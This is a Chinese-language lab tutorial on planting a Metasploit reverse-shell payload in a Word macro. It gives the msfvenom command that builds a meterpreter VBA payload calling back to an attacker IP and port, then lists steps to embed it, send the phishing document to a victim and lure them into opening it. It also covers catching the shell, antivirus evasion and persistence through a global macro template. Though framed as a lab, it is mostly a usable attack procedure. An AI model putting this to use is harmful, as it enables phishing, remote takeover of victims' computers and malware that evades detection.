實驗名稱:
利用Office宏病毒反彈shell
病毒簡介:
宏病毒是一種寄存在文檔或模板的宏中的計算機病毒。一旦打開這樣的文檔,其中的宏就會被執行,於是宏病毒就會被激活,轉移到計算機上,並駐留在Normal模板上。從此以後,所有自動保存的文檔都會“感染”上這種宏病毒,而且如果其他用戶打開了感染病毒的文檔,宏病毒又會轉移到他的計算機上,攻擊者甚至可以利用在宏代碼中寫入反彈shell腳本,誘騙受害者打開帶有宏病毒的office文檔,實現對其主機的遠程控制。
實現過程:
1.首先實驗攻擊者利用本地(172.16.0.55)的Metasploit工具生成payload文件,生成名為jaky.vba的文件.
命令如下:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.0.55 LPORT=6666 -f vba -o JAky.vba
2.我們可以先cat一下這個文件,看看這跟文件裡面payload的內容。
3.也可以將這個文件放到網站根目錄下面,通過網站的方式打開這個文件, 查看生成的payload
4.將vba代碼錄入宏中,我們可以先新建一個word文檔。
5.打開word文檔,默認情況下,宏是關閉的,進入信任中心,點擊信任中心設置,手動開啟一下。
6.開始設置宏內容:宏的名字可以任意命名,點擊“創建”出現宏的編輯器。
7.將之前生成的宏病毒payload,複製到新創建的宏裡面。
8.將文檔保存另存為包含宏的文檔類型,這裡其實也可以直接保存的。
9.保存後退出,並通過各種方式向受害者發送此釣魚文檔,並引誘其打開。
10.在kali上面設置監聽模式等待對方點擊文檔,然後反彈shell
11.執行監聽,然後誘騙點擊文檔,就可以看到反彈過來的shell了,拿到用戶權限。當文檔關閉的時候,該工作組會被關閉,所以建議做進程遷移。
12.更加惡劣的是,當這個宏病毒一旦注入到目標主機時,後面不管用戶新建或者打開什麼word文檔,都會被反彈連接上來。
實驗拓展:
1.實驗過程中,這種簡單的shellcode,可能會被殺毒軟件報毒。對shellcode部分可以嘗試做一下免殺處理。
2.如果創建的是全局宏,Office會在這個目錄生成一個dotm文檔:
C:Users(username)AppDataRoamingMicrosoftTemplates
注:全局宏是對於當前計算機所有文檔對象有效,即文檔本身不包含宏代碼,也可以運行全局宏。但是本身的全局宏名字是隨機生成的,所以要先創建一個全局宏,定義一下名字。打開其他文檔時才能調用並執行代碼。
這個全局宏中的文件:vbaProject.bin是包含了特徵的文件,但是反病毒軟件不會掃描這個文件,除非主動查殺。這個特性可以達到維持權限的作用。
